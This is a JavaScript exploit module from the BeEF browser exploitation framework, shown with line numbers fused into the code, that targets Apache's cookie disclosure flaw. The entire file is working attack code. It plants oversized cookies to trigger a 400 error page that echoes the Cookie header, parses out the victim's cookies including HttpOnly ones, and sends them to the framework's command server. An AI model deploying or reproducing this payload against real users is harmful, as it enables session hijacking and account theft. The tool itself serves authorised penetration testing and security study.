Path: blob/master/modules/exploits/apache_cookie_disclosure/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56// BASED ON https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb0878beef.execute(function() {910function setCookies (good) {1112var str = "";1314for (var i=0; i< 819; i++) {15str += "z";16}1718for (i = 0; i < 10; i++) {1920if (good) { // Expire evil cookie21var cookie = "beef" + i + "=;expires=" + new Date(+new Date()-1).toUTCString() + "; path=/;";22} else { // Set evil cookie23var cookie = "beef" + i + "=" + str + "; path=/";24}25document.cookie = cookie;26}27}2829function makeRequest() {30setCookies();3132function parseCookies () {33var cookie_dict = {};3435// React on 400 status36if (xhr.readyState === 4 && xhr.status === 400) {3738// Replace newlines and match <pre> content39var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);4041if (content.length) {4243// Remove "Cookie:" prefix44content = content[1].replace("Cookie: ", "");4546var cookies = content.replace(/beef\d=z+;?/g, '').split(/;/g);4748// Add cookies to object49for (var i=0; i<cookies.length; i++) {50var s_c = cookies[i].split('=',2);51cookie_dict[s_c[0]] = s_c[1];52}53}5455// Unset malicious cookies56setCookies(true);5758var result = JSON.stringify(cookie_dict);5960beef.net.send("<%= @command_url %>", <%= @command_id %>, "cookies="+result);6162}63}6465// Make XHR request66var xhr = new XMLHttpRequest();67xhr.onreadystatechange = parseCookies;68xhr.open("GET", "/", true);69xhr.send(null);70}7172makeRequest();7374});7576